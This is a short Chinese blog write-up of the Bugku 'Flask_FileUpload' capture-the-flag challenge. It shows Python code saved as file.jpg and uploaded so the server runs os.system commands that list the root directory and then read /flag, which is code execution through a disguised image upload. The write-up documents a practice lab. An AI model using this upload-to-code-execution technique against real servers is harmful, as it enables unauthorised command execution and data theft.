技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
神奇的程序员
7 小时前
我的软件冲进苹果商店下载榜前 50 了
前端
阳光是sunny
8 小时前
别再被 worktree 绕晕了!AI 编程时代你必须掌握的 Git 隔离神器
前端·人工智能·后端
万少
9 小时前
万少的博客 - 技术分享与解决方案
前端·javascript·后端
apocelipes
11 小时前
常用编程语言和库的正则表达式性能对比
c语言·c++·python·性能优化·golang·开发工具和环境
尘世中一位迷途小书童
11 小时前
用 Cesium 撸了一个森林火情监控大屏,弧线、粒子、发光效果都齐了
前端·javascript
IT_陈寒
12 小时前
垃圾回收器选错了,我的Java服务内存炸了
前端·人工智能·后端
月光下的丝瓜
12 小时前
Flutter 国内安装指南
前端·flutter
用户835629078051
13 小时前
使用 Python 在 PDF 中创建与管理书签
后端·python
玄星啊
13 小时前
AI 编程的第 30 天,我怀念古法 Coding 了
前端·ai编程
Jolyne_
13 小时前
Angular基础速通
前端·angular.js
热门推荐
012026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf02GitHub 镜像站点032026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?04【AI】2026 年具身智能模型和世界模型总结052026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?06Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析07Trae国际版与国内版深度测评:AI原生IDE的双生花082026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?09飞书长连接_事件订阅(接收消息,审批任务状态变更)102026 年 AI 大模型 & AI 编程工具实战全总结